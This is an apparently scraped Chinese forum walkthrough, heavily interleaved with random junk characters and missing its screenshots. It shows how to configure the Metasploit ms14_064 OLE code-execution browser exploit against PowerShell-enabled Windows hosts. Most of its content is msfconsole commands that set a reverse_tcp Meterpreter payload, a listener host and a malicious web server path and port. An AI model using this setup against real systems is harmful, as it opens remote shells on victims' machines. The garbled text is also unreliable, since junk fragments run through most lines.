Y+ y. z4 v% O) ^ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 {* A& G0 d* K) C6 w
* I; H1 E T5 ]5 J
& \; c# G) f9 n 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
, t* U0 C+ P/ f! ~; P- m8 ~* P; c! u0 R
0 g! x" b, m8 y4 D/ l
$ X* }6 ^4 h) r/ h, W 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp% P$ {) q* a: J6 T
$ Q, [6 ]3 ]1 Q0 n" d% G1 R9 t
set AllowPowershellPrompt true& K$ z# G! P3 Z6 t7 Z+ B6 |
5 ^/ q5 F' L2 h7 a' K) D
; D! A" q2 S4 s0 {4 C Set LHOST 192.168.0.109
, W! A& W6 ^, D7 r6 [1 [
( R2 s3 `. L, I+ y/ `2 I- |5 D4 ]4 C9 b7 F a
set SRVHOST 192.168.0.1097 I- g. B4 I0 K, y5 |
2 S, y0 H1 S: _, a
( Z8 F1 R7 x8 V" p. k0 l Set uripath share; X9 {5 K1 ], [4 Y
+ |' j* s- S9 j
7 V3 A) x; ]0 x" b( b& g$ O Set srvport 80
3 y9 X/ A4 b# y. u y ]' U5 P0 {
: d. Z( _, n2 k. t5 ~7 Z; B) p$ C5 l
K$ _; c! V+ T4 S
- O- z) I' F0 a" s
( E6 }# n4 ? }$ U( w3 o7 ]1 n9 g
2 ?* [2 X0 {/ g
& a8 U8 H6 ~% P7 E2 r) X0 v/ {
" M4 q# T# b8 a* [! a6 g) c* R
# I$ N0 x: N( a5 B) \
/ P0 t, n. b! z! S8 I* A( n
, K- k0 s4 ?- D2 }
) b( ]% H) F% c+ r2 _/ {( X' p
5 V+ ~8 ^$ A, T% a4 y9 e1 n( c- E
1 y$ Z% b9 @0 z- Y9 e) Q
& R/ B& g- a3 f" H$ b* r
* ^9 ^% s" `) Q- L6 L2 R/ b
* u5 l G- H1 T/ i5 `
下面我们来访问本地地址如图:
6 ?6 B0 M X' D" h
8 g5 b- ]. k- l" p5 _. w( i+ G N( } I4 J" t; }5 r* `! Z- I1 L- [
: _' c y2 G4 y$ i' A) T
6 h* F% k% q4 R; u. a: x8 o+ t. z
+ R0 y! K+ d3 n8 {9 g9 K8 f
& b3 ]8 m; j" A
. k0 G9 X b2 K
; `6 i+ }. q! x! c; x2 W- X
/ u) `, l' }: g! F- c- W+ q: L2 ]